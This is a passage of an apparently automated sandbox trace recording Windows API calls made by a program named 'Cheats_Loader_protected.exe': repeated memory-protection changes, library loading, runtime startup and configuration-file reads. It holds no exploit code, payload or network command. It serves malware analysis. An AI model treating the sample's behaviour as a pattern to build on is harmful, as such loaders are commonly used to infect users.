returned 0x0 [0056.734] GetCurrentProcess () returned 0xffffffff [0056.734] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef208, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.734] GetCurrentProcess () returned 0xffffffff [0056.734] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef22c, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.734] GetCurrentProcess () returned 0xffffffff [0056.734] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef22c, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.734] GetCurrentProcess () returned 0xffffffff [0056.734] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2a0, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.735] GetCurrentProcess () returned 0xffffffff [0056.735] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2a0, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.735] GetCurrentProcess () returned 0xffffffff [0056.735] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2a8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.735] GetCurrentProcess () returned 0xffffffff [0056.735] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2a8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.735] GetCurrentProcess () returned 0xffffffff [0056.735] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2b0, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.735] GetCurrentProcess () returned 0xffffffff [0056.735] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2b0, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.736] GetCurrentProcess () returned 0xffffffff [0056.736] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2c8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.736] GetCurrentProcess () returned 0xffffffff [0056.736] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2c8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.736] GetCurrentProcess () returned 0xffffffff [0056.736] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2cc, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.736] GetCurrentProcess () returned 0xffffffff [0056.736] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2cc, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.736] GetCurrentProcess () returned 0xffffffff [0056.736] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2d8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.737] GetCurrentProcess () returned 0xffffffff [0056.737] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2d8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.737] GetCurrentProcess () returned 0xffffffff [0056.737] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2f8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.737] GetCurrentProcess () returned 0xffffffff [0056.737] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef2f8, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.737] GetCurrentProcess () returned 0xffffffff [0056.737] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef368, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.738] GetCurrentProcess () returned 0xffffffff [0056.738] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef368, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.738] GetCurrentProcess () returned 0xffffffff [0056.738] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef36c, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x4, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x2) returned 0x0 [0056.738] GetCurrentProcess () returned 0xffffffff [0056.738] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ffa9c*=0x740ef36c, NumberOfBytesToProtect=0x13ffaa0, NewAccessProtection=0x2, OldAccessProtection=0x13ffad4 | out: BaseAddress=0x13ffa9c*=0x740ef000, NumberOfBytesToProtect=0x13ffaa0, OldAccessProtection=0x13ffad4*=0x4) returned 0x0 [0056.738] SetLastError (dwErrCode=0x0) [0056.739] GetProcAddress (hModule=0x73a60000, lpProcName="SetRuntimeInfo") returned 0x73b60630 [0056.740] GetProcAddress (hModule=0x73a60000, lpProcName="_CorExeMain") returned 0x73b8f7d0 [0056.819] SysReAllocStringLen (in: pbstr=0x13ffad0*=0x0, psz="api-ms-win-core-quirks-l1-1-0.dll", len=0x21 | out: pbstr=0x13ffad0*="api-ms-win-core-quirks-l1-1-0.dll") returned 1 [0056.819] CharLowerBuffW (in: lpsz="api-ms-win-core-quirks-l1-1-0.dll", cchLength=0x21 | out: lpsz="api-ms-win-core-quirks-l1-1-0.dll") returned 0x21 [0056.820] LoadLibraryExW (lpLibFileName="api-ms-win-core-quirks-l1-1-0.dll", hFile=0x0, dwFlags=0x800) returned 0x74bc0000 [0056.820] GetLastError () returned 0x0 [0056.820] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0056.820] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0056.820] GetModuleFileNameA (in: hModule=0x74bc0000, lpFilename=0x13ff9b4, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0056.820] SetLastError (dwErrCode=0x0) [0056.820] GetProcAddress (hModule=0x74bc0000, lpProcName="QuirkIsEnabled3") returned 0x74c93170 [0056.820] GetProcAddress (hModule=0x74bc0000, lpProcName="QuirkGetData2") returned 0x74ced520 [0056.823] SysReAllocStringLen (in: pbstr=0x13ff67c*=0x0, psz="api-ms-win-appmodel-runtime-l1-1-2.dll", len=0x26 | out: pbstr=0x13ff67c*="api-ms-win-appmodel-runtime-l1-1-2.dll") returned 1 [0056.823] CharLowerBuffW (in: lpsz="api-ms-win-appmodel-runtime-l1-1-2.dll", cchLength=0x26 | out: lpsz="api-ms-win-appmodel-runtime-l1-1-2.dll") returned 0x26 [0056.823] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2.dll", hFile=0x0, dwFlags=0x800) returned 0x773a0000 [0056.823] GetLastError () returned 0x0 [0056.823] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0056.823] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0056.823] GetModuleFileNameA (in: hModule=0x773a0000, lpFilename=0x13ff560, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")) returned 0x26 [0056.824] GetCurrentProcess () returned 0xffffffff [0056.824] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff664*=0x773a837c, NumberOfBytesToProtect=0x13ff668, NewAccessProtection=0x4, OldAccessProtection=0x13ff69c | out: BaseAddress=0x13ff664*=0x773a8000, NumberOfBytesToProtect=0x13ff668, OldAccessProtection=0x13ff69c*=0x2) returned 0x0 [0056.824] GetCurrentProcess () returned 0xffffffff [0056.824] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff664*=0x773a837c, NumberOfBytesToProtect=0x13ff668, NewAccessProtection=0x2, OldAccessProtection=0x13ff69c | out: BaseAddress=0x13ff664*=0x773a8000, NumberOfBytesToProtect=0x13ff668, OldAccessProtection=0x13ff69c*=0x4) returned 0x0 [0056.824] GetCurrentProcess () returned 0xffffffff [0056.824] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff664*=0x773a838c, NumberOfBytesToProtect=0x13ff668, NewAccessProtection=0x4, OldAccessProtection=0x13ff69c | out: BaseAddress=0x13ff664*=0x773a8000, NumberOfBytesToProtect=0x13ff668, OldAccessProtection=0x13ff69c*=0x2) returned 0x0 [0056.824] GetCurrentProcess () returned 0xffffffff [0056.824] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff664*=0x773a838c, NumberOfBytesToProtect=0x13ff668, NewAccessProtection=0x2, OldAccessProtection=0x13ff69c | out: BaseAddress=0x13ff664*=0x773a8000, NumberOfBytesToProtect=0x13ff668, OldAccessProtection=0x13ff69c*=0x4) returned 0x0 [0056.824] SetLastError (dwErrCode=0x0) [0056.826] GetProcAddress (hModule=0x773a0000, lpProcName="AppPolicyGetClrCompat") returned 0x773a31b0 [0056.826] GetProcAddress (hModule=0x773a0000, lpProcName="GetCurrentPackageId") returned 0x773a3510 [0056.826] GetProcAddress (hModule=0x773a0000, lpProcName="GetCurrentPackageInfo") returned 0x773a3520 [0056.826] GetProcAddress (hModule=0x773a0000, lpProcName="GetCurrentPackagePath") returned 0x773a3530 [0056.841] GetCurrentThreadId () returned 0x13dc [0056.841] ResetEvent (hEvent=0x200) returned 1 [0056.841] GetCurrentThreadId () returned 0x13dc [0056.841] GetCurrentThreadId () returned 0x13dc [0056.841] GetCurrentThreadId () returned 0x13dc [0056.841] GetCurrentThreadId () returned 0x13dc [0056.841] ResetEvent (hEvent=0x200) returned 1 [0056.841] GetCurrentThreadId () returned 0x13dc [0056.842] GetCurrentThreadId () returned 0x13dc [0056.842] SetEvent (hEvent=0x20c) returned 1 [0056.842] SetEvent (hEvent=0x200) returned 1 [0056.842] CloseHandle (hObject=0x278) returned 1 [0056.842] GetCurrentThreadId () returned 0x13dc [0056.842] ResetEvent (hEvent=0x200) returned 1 [0056.842] GetCurrentThreadId () returned 0x13dc [0056.842] GetCurrentThreadId () returned 0x13dc [0056.842] GetCurrentThreadId () returned 0x13dc [0056.842] GetCurrentThreadId () returned 0x13dc [0056.842] ResetEvent (hEvent=0x200) returned 1 [0056.842] GetCurrentThreadId () returned 0x13dc [0056.842] GetCurrentThreadId () returned 0x13dc [0056.842] SetEvent (hEvent=0x20c) returned 1 [0056.842] SetEvent (hEvent=0x200) returned 1 [0056.842] CloseHandle (hObject=0x274) returned 1 [0056.843] SysReAllocStringLen (in: pbstr=0x13ff590*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x13ff590*="KERNEL32.DLL") returned 1 [0056.843] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0056.843] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0056.845] GetProcAddress (hModule=0x772d0000, lpProcName="AcquireSRWLockExclusive") returned 0x779b58e0 [0056.847] GetProcAddress (hModule=0x772d0000, lpProcName="ReleaseSRWLockExclusive") returned 0x779b83a0 [0056.848] SysReAllocStringLen (in: pbstr=0x13ff0a4*=0x0, psz="mscoree.dll", len=0xb | out: pbstr=0x13ff0a4*="mscoree.dll") returned 1 [0056.848] CharLowerBuffW (in: lpsz="mscoree.dll", cchLength=0xb | out: lpsz="mscoree.dll") returned 0xb [0056.848] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0056.848] GetLastError () returned 0x7e [0056.848] SetLastError (dwErrCode=0x7e) [0056.849] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xe7c144, cbMultiByte=11, lpWideCharStr=0x13fe578, cchWideChar=2047 | out: lpWideCharStr="mscoree.dll\x05ĿĿ㳰\x07ĿĿ\x1f") returned 11 [0056.849] SysReAllocStringLen (in: pbstr=0x13ff57c*=0x0, psz="mscoree.dll", len=0xb | out: pbstr=0x13ff57c*="mscoree.dll") returned 1 [0056.849] CharLowerBuffW (in: lpsz="mscoree.dll", cchLength=0xb | out: lpsz="mscoree.dll") returned 0xb [0056.849] LoadLibraryExA (lpLibFileName="mscoree.dll", hFile=0x0, dwFlags=0x0) returned 0x74270000 [0056.849] GetLastError () returned 0x0 [0056.849] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0056.849] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0056.849] GetModuleFileNameA (in: hModule=0x74270000, lpFilename=0x13ff464, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\SYSTEM32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")) returned 0x1f [0056.849] GetCurrentProcess () returned 0xffffffff [0056.849] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd010, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x4, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x2) returned 0x0 [0056.850] GetCurrentProcess () returned 0xffffffff [0056.850] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd010, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x2, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x4) returned 0x0 [0056.850] GetCurrentProcess () returned 0xffffffff [0056.850] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd018, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x4, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x2) returned 0x0 [0056.850] GetCurrentProcess () returned 0xffffffff [0056.850] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd018, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x2, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x4) returned 0x0 [0056.850] GetCurrentProcess () returned 0xffffffff [0056.850] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd03c, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x4, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x2) returned 0x0 [0056.850] GetCurrentProcess () returned 0xffffffff [0056.850] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd03c, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x2, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x4) returned 0x0 [0056.851] GetCurrentProcess () returned 0xffffffff [0056.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd054, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x4, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x2) returned 0x0 [0056.851] GetCurrentProcess () returned 0xffffffff [0056.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd054, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x2, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x4) returned 0x0 [0056.851] GetCurrentProcess () returned 0xffffffff [0056.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd06c, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x4, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x2) returned 0x0 [0056.851] GetCurrentProcess () returned 0xffffffff [0056.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd06c, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x2, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x4) returned 0x0 [0056.851] GetCurrentProcess () returned 0xffffffff [0056.851] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd090, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x4, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x2) returned 0x0 [0056.852] GetCurrentProcess () returned 0xffffffff [0056.852] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd090, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x2, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x4) returned 0x0 [0056.852] GetCurrentProcess () returned 0xffffffff [0056.852] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd13c, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x4, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x2) returned 0x0 [0056.852] GetCurrentProcess () returned 0xffffffff [0056.852] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd13c, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x2, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x4) returned 0x0 [0056.852] GetCurrentProcess () returned 0xffffffff [0056.852] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd150, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x4, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x2) returned 0x0 [0056.852] GetCurrentProcess () returned 0xffffffff [0056.852] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd150, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x2, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x4) returned 0x0 [0056.853] GetCurrentProcess () returned 0xffffffff [0056.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd1a8, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x4, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x2) returned 0x0 [0056.853] GetCurrentProcess () returned 0xffffffff [0056.853] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff568*=0x742bd1a8, NumberOfBytesToProtect=0x13ff56c, NewAccessProtection=0x2, OldAccessProtection=0x13ff5a0 | out: BaseAddress=0x13ff568*=0x742bd000, NumberOfBytesToProtect=0x13ff56c, OldAccessProtection=0x13ff5a0*=0x4) returned 0x0 [0056.853] SetLastError (dwErrCode=0x0) [0056.853] GetProcAddress (hModule=0x74270000, lpProcName=0x740dc00a) returned 0x74282110 [0056.854] GetProcAddress (hModule=0x74150000, lpProcName="CreateConfigStream_RetAddr") returned 0x0 [0056.854] GetProcAddress (hModule=0x74150000, lpProcName="CreateConfigStream") returned 0x7415bee0 [0056.854] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.854] GetLastError () returned 0x2 [0056.854] SysReAllocStringLen (in: pbstr=0x13ff594*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", len=0x3a | out: pbstr=0x13ff594*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config") returned 1 [0056.854] GetThreadLocale () returned 0x409 [0056.854] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0056.854] GetThreadLocale () returned 0x409 [0056.854] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0056.854] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", nBufferLength=0x104, lpBuffer=0x13ff318, lpFilePart=0x13ff314 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", lpFilePart=0x13ff314*="Cheats_Loader_protected.exe.config") returned 0x3a [0056.854] SysReAllocStringLen (in: pbstr=0x13ff594*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", len=0x3a | out: pbstr=0x13ff594*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config") returned 1 [0056.854] SysReAllocStringLen (in: pbstr=0x13ff544*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", len=0x3a | out: pbstr=0x13ff544*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config") returned 1 [0056.854] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", cchLength=0x3a | out: lpsz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe.config") returned 0x3a [0056.854] SysReAllocStringLen (in: pbstr=0x13ff594*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", psz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe.config", len=0x3a | out: pbstr=0x13ff594*="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe.config") returned 1 [0056.854] SetLastError (dwErrCode=0x2) [0056.856] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x274 [0056.860] GetLastError () returned 0x0 [0056.860] SysReAllocStringLen (in: pbstr=0x13ff5b4*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", len=0x43 | out: pbstr=0x13ff5b4*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config") returned 1 [0056.860] GetThreadLocale () returned 0x409 [0056.860] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0056.860] GetThreadLocale () returned 0x409 [0056.860] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0056.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x104, lpBuffer=0x13ff338, lpFilePart=0x13ff334 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x13ff334*="machine.config") returned 0x43 [0056.860] SysReAllocStringLen (in: pbstr=0x13ff5b4*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", 